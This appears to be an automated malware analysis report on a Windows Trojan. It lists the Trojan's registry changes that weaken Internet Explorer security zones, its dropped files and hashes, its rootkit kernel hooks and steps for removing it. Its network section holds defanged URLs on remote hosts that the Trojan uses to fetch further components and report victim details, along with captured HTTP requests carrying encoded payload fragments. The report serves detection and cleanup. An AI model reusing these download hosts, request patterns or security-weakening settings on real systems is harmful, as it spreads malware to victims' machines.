"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 E3 22 63 02 25 39 AD A1 3E C2 E1 1A 86 45 50"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ndislib.exe:3296 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 B7 C4 21 DA 26 5B B7 48 09 01 EF 15 6D 02 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\uo2zITM\Security]
[HKLM\System\CurrentControlSet\Services\uo2zITM]
[HKLM\System\CurrentControlSet\Services\uo2zITM\Enum]

Dropped PE files

MD5	File path
ac26e6f812162a024170cb017e6da5c8	c:\WINDOWS\HpE\hdptlk.exe
eba2283a18b7a9e89bf308a9e5e1608c	c:\WINDOWS\HpE\sys32\urlnav.dll
fc2c1ce99b49f7ac04ef3ff570061ae9	c:\WINDOWS\system32\LQdhJ\yYJSx.exe
d70c6fba5055c9f030553d69ca959ef1	c:\WINDOWS\system32\drivers\HideSys.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwCreateSection

The Trojan installs the following kernel-mode hooks:

ZwOpenProcess
ZwQuerySystemInformation

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):
nvsvc32.exe:2544
hdptlk.exe:2556
ndis500.exe:2916
yYJSx.exe:1976
appmon.exe:3368
%original file name%.exe:228
MiniIE.exe:2752
ndsqp.exe:2956
tray.exe:3316
traytp.exe:452
ndislib.exe:3296
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\HpE\wow64\configWord.cf (676 bytes)
%WinDir%\HpE\wow64\rebuild.exe (8147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\hotkey[1].txt (676 bytes)
%System%\cBLK.dll (2341 bytes)
%System%\clk.ini (186 bytes)
%WinDir%\HpE\wow64\DProEx.sys (1176 bytes)
%WinDir%\HpE\wow64\reTcp.sys (588 bytes)
%WinDir%\HpE\wow64\config.ini (98 bytes)
%WinDir%\HpE\sys32\weblog.log (263 bytes)
%WinDir%\HpE\sys32\m0gtv9N (3809 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\evaqocv.txt (17 bytes)
%System%\tl.dat (13 bytes)
%System%\bc.dat (3808 bytes)
%System%\tl.txt (1444 bytes)
%WinDir%\HpE\First.txt (23220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yfodbgl.txt (2321 bytes)
%WinDir%\HpE\sys32\urlnav.txt (14076 bytes)
%System%\ndislib.exe (243 bytes)
%WinDir%\HpE\hdptlk.exe (139 bytes)
%WinDir%\HpE\sys32\tray.txt (221016 bytes)
%WinDir%\HpE\wow64\nvsvc32.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tcueuqo.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mwgxskf.txt (673 bytes)
%WinDir%\HpE\exec\traytp.exe (1794 bytes)
%WinDir%\HpE\wow64\nvsvc32.txt (448324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lfllrdu.txt (15278 bytes)
%WinDir%\HpE\MiniIE.txt (175005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\przmycg.txt (673 bytes)
%System%\ndislib.txt (40972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sccppeu.txt (13122 bytes)
%System%\bc.txt (127812 bytes)
%WinDir%\HpE\MiniIE.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uwvmjte.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mxezyyf.txt (7345 bytes)
%WinDir%\HpE\sys32\ndis500.exe (325 bytes)
%WinDir%\HpE\sys32\whitelist.dat (2 bytes)
%WinDir%\HpE\sys32\urlnav.dll (83 bytes)
%System%\appmon.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ihutphk.txt (1425 bytes)
%WinDir%\HpE\sys32\tray.exe (7972 bytes)
%WinDir%\HpE\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rhkqvcb.txt (26096 bytes)
%WinDir%\HpE\sys32\ndis500.txt (55748 bytes)
%System%\lhc.txt (32148 bytes)
%WinDir%\HpE\sys32\ndsqp.exe (106 bytes)
%WinDir%\HpE\exec\traytp.txt (88420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\oqgrsfe.txt (10177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nagsjof.txt (601 bytes)
%WinDir%\HpE\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ipobzxt.txt (4545 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (263811 bytes)
%System%\lhc.dat (185 bytes)
%WinDir%\HpE\sys32\ndsqp.txt (17980 bytes)
%WinDir%\Temp\AdbWinUsbApi.dll (60 bytes)
%WinDir%\Temp\adbWinpi.dll (304 bytes)
%WinDir%\Temp\Cattle.exe (3727 bytes)
%WinDir%\Temp\AdbWinApi.dll (96 bytes)
%WinDir%\Temp\TscServer.exe (1653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PYJT5JHI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\desktop.ini (67 bytes)
%System%\LQdhJ\yYJSx.exe (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4IK7RMW\desktop.ini (67 bytes)
%WinDir%\HpE\sys32\oK455Vp (13 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (22 bytes)
%WinDir%\HpE\sys32\services.exe (3904 bytes)
%WinDir%\HpE\exec\ico.ini (292 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\statbar[1].ini (152 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\traytp.lnk (640 bytes)
%System%\v9pce8W (1629 bytes)
%System%\weblog.log (349 bytes)
%System%\gy17y1D.sys (22 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	455174	0	0	d41d8cd98f00b204e9800998ecf8427e
.rdata	462848	2431724	0	0	d41d8cd98f00b204e9800998ecf8427e
.data	2895872	207240	0	0	d41d8cd98f00b204e9800998ecf8427e
.vmp0	3104768	966430	0	0	d41d8cd98f00b204e9800998ecf8427e
.vmp1	4071424	3871300	3874816	5.44825	0c41f9724bee2aaa564195d102c256f0
.rsrc	7946240	5744	8192	1.90322	200729e9e76fca5d3157a990fafb7b96

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL	IP
hxxp://update.down123.net/tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131&version=2.0.0.4	115.28.45.16
hxxp://update.down123.net/deploy.php?ConFig=xz9	115.28.45.16
hxxp://1st.ecoma.ourwebpic.com/plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37
hxxp://ln.p2ptool.com/txt/tray_20150624.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=B8306AB9C2162907E3E8248D11FF7A56	60.18.147.37
hxxp://ln.p2ptool.com/txt/urlnav_20150922.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=5FC91A5A977345D62B641C89CD1CE439	60.18.147.37
hxxp://ln.p2ptool.com/txt/popup_20150930.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=10A09BBF8BDB9E612ED1DF8F61B9CC3C	60.18.147.37
hxxp://ln.p2ptool.com/txt/First_20150519.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209	60.18.147.37
hxxp://ln.p2ptool.com/txt/minie_20151111.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=9F815C0051C483DA569169A49B602D2A	60.18.147.37
hxxp://ln.p2ptool.com/txt/listbc_20151106222121.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=528D1A231BC2A6FDDAB37F9BE32D5F93	60.18.147.37
hxxp://ln.p2ptool.com/txt/list666_20151104221146.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=CE0BAC1422C834FD0E304C8696FEA341	60.18.147.37
hxxp://ln.p2ptool.com/txt/listtl_20151106225212.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=4B0E137FE48D0E571230DAD7F1219CBA	60.18.147.37
hxxp://ln.p2ptool.com/txt/ndis500_201511062222.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=54F3F83A085F1E98C35C0A722AB6E096	60.18.147.37
hxxp://ln.p2ptool.com/txt/qpqpqp_201511062252.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=DB76EA1050F45972FC55D29EC800228E	60.18.147.37
hxxp://ln.p2ptool.com/txt/app_20150618.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=8097F137AC26A6567AB9ADCE590E5996	60.18.147.37
hxxp://ln.p2ptool.com/txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C	60.18.147.37
hxxp://ln.p2ptool.com/txt/miniIE_150427.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6	60.18.147.37
hxxp://ln.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94	60.18.147.37
hxxp://plus.zzinfor.cn/plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37	203.130.58.30

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:49 GMT

Content-Type: text/plain

Content-Length: 324428

Last-Modified: Tue, 10 Nov 2015 11:43:50 GMT

Connection: close

ETag: "5641d876-4f34c"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnKaEKbhAp/JvZsvB8Nn4Io6syqgQ9/SDaBLyvdjThfOrxE3XJ re1nM L5TwwJP6H0pEUYmcRBmOceMRuqxVNkb7JwfEVu4XsUhcvwly vksMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB0xVG2WOXvXn3YNPrA6SxfVvh3CJHt4bIKI0mNWJEoCFRjYnLeAoMjy5ye8miatn/lycn0DaQTrWJvgEYtUqAbYm ARi1SoBtPvK pACZjJd7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrbN9ymUhbHBOK3fYskZxLv8TazQ2ZSPlrxNrNDZlI WuRDnkI6xLTnMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrF1t0sbdoWZzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziGb5WV0mXW AYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7qzIWGvSJ2G7O6XC5Y8YEKsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWN0D6Bmr0kKeRSI7 4oAkizE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oW3yI nE 5Ft5gY56mj9A0om63bSlJ/0Oy6tRS5Dm3SiqSQMs7a n1G2cKNuElZSmmL5PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz

<<< skipped >>>

GET /txt/qpqpqp_201511062252.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=DB76EA1050F45972FC55D29EC800228E HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:46 GMT

Content-Type: text/plain

Content-Length: 141392

Last-Modified: Fri, 06 Nov 2015 14:52:41 GMT

Connection: close

ETag: "563cbeb9-22850"

Accept-Ranges: bytes

<<< skipped >>>

GET /txt/listtl_20151106225212.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=4B0E137FE48D0E571230DAD7F1219CBA HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:39 GMT

Content-Type: text/plain

Content-Length: 17808

Last-Modified: Fri, 06 Nov 2015 14:52:13 GMT

Connection: close

ETag: "563cbe9d-4590"

Accept-Ranges: bytes

fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROKjttvFmiakCZt5yAEloqcdFU3c0qOtFRYDZAdHHwb Qxt9I jqSgc4ULm66opXrWBkOiGdpJ xQoMTH3OmgMQJkUShelUIsDfL/hdCWFtkn/y62uU0mNGqMsAApyLHJ4j6aH00q0LLsr6FlXJFw9vDIbA8NM/MBAcsX/7BlxWcm jOrtHzXNJwHVr1zBaZBvDIhS24H2g4292X8RJor98PJ/3Y RAHLFiBns21a08LzZ9NQJKMqlTtge75/mtJONL4g mIuCzv1s5vG78A6DGTbVaOa1tXM1tCuQn5reB/GadtqV6Y5LJt7Ek3k/W2aZ85m6MostnYNXS5PA1dBcmiDVyHpS9CA/ZF3msze1qfmM4ySmpBTxy1O5vT wkQGvUjqJOUSqN7 bFBWSdZKyfDWgfcJ5BEK rYVr4Ti1ZvAVDdS9TT0sp1QglzpGQ7ATTd2J nZGQwwbwoUSDkEDD/jk3M/k5HFHcsbNHhOchtR0U1l60XX357YnLbrtgMM24tPM5IuTMWwWZewnxW8JOIptenBO3ZCnKp1kJtXgfe1UW4uGAjNlmR1fKC L/NftvcUWkpO9eliCl2AfmFx/qgZ13w8PyvLPTXcL JXD5HyRaMQdZ9Y7YcIDfT0iBIhvTM5jY66l3DbzUJcXQNKlZgqSb8 Ae/V2PH/qVC6zaNt9XzQFqYllpIjfOSbQ7ki3aXAJVFiW6v36EHjFGWhMWrbTuoJTZfRk6hAkN4gK3q3Z1tP8vDNMzE/D7lZg9mIww7esNKBvDHYPwFmdbrZOFClhIIzcEryxXp2kGPfrBsQqtlv3i8iM3CgETUyfIVMbla/r4MeVT60Etch7IV4MKloRceCEaHUIUEsGpfKiTsLH4l5FkFAOIc3buJHaeAMAmh7Xojqnpz f/tYFXf2j1pee3DTbhsT82ABDkRytOsKxFXiAuofNV2GHabjaUOJQ6mxSx8oPqfELHIPn1p5WgBmct5GdqTfL3bMRF95j5esatBQcGwPgULXT4RnY9gix5OJKSK0ajYbXQG7I8LIt7IZTOzLWFySDobY2xdfxLtQybtJZsMP5pvpqhsEWYZUwLMKhdFzYWEYNMUGUipV/spHDdbiVSrjhP9b/qwVyW6YFLoiO7uVwvsrX 14gkE ted0FmzahoKLwWTeoxgP5l8NNC2S4mDakhpSpLhK/UwVQ5/Drrjs5c9WLgqTwr6e3lBGIRg0ZBKieftYq0gI9u9aqmfDv145VCYstieNcaIFj2Iv/A/o7REZEvT4V2cS4biMlG4duycqvLpBkaFhyg3GPNDAHGzziZISsm5psTMviD6Yi4LO/WXVjfp5EIfQ8ySqMTmVe/CcLz/v6BdJXF4J7nCND/v2Ho5LnzeIeKyScOGHbxpIXGwz5Bmp7YZJm1Lj Lt4SWIq6OULu3vMH eoC/mJ kA15SGWTSvEPvDvFy6X6sH0VAKKIWpnEtiaLhYCFIZ7MkkDIfQ3wN50TZmRvl620owG

<<< skipped >>>

GET /txt/popup_20150930.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=10A09BBF8BDB9E612ED1DF8F61B9CC3C HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)

Host: ln.p2ptool.com

Connection: Close

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: Tengine/2.0.2

Date: Wed, 11 Nov 2015 11:15:30 GMT

Content-Type: text/plain

Content-Length: 1840480

Last-Modified: Wed, 30 Sep 2015 02:45:35 GMT

Connection: close

ETag: "560b4ccf-1c1560"

Accept-Ranges: bytes

nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI Wu wwnN9cEhzQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnJuacViNEyUzNtsQ1NYTf8d27GQD/J9XGD4qYxi8vxIiixIcnCOyBlOFqr9ETxrT SBHjArMiqMiHMIxSfRWU4KPY5pTF7DF2xKszLM0SuU/GyPDEKip3LDGtIHKgAjlwGoaHXIorCjbMTazQ2ZSPlr5flXLXC5JH3rPV7VCE5C4Yz4h3K0AOlFthiN4cVI3AP3NdgUfwDLK6r5zh2O0mhQ43fNWIPwFNWXJyfQNpBOtYm ARi1SoBtib4BGLVKgG0V2AJJhDBVqEnSGpMq4o L6wxom51VeVbrDGibnVV5VlEmG8hVGu5ExNrNDZlI WuKOtlnCKi AJIKLreHt1XkxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrObdsagrdZm/E2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrmemWon5Q0qfE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvoEO8sXymTr y6jpxuwh2p u92whz 8tvE2s0NmUj5azE4dSQE6hF3aV6mEpZjZPV9cZRQclYDv0cRH5FzB75MxNrNDZlI WvqkpwmtYwEg/WqE7QcsrWWDxWdJSNxrGJ7Zm5VGZfamcTazQ2ZSPlrcLYj0lqrlCI/Rp3LuKWWWLGPOS2/c nLVhRzQsiYEo7E2s0NmUj5a qSnCa1jASDxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a5OX8lKKswkonGwm ElZZQzib/wxCcfowCJZYUINYVTz1wg5aryKKMjyVskrcu QLtkrK5piaVn9RyE0rmYnzCbUjapOQdShugPmV6dHZsIK5F58pVNTdf3jCmkkLn7p8wnDtqlaMSXs8lbJK3LvkC4dUkaCFQH4uN1W2huWLpgU

<<< skipped >>>

GET /txt/whitelist.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1

Accept: */*

Accept-Encoding: deflate

Accept-Language: zh-cn

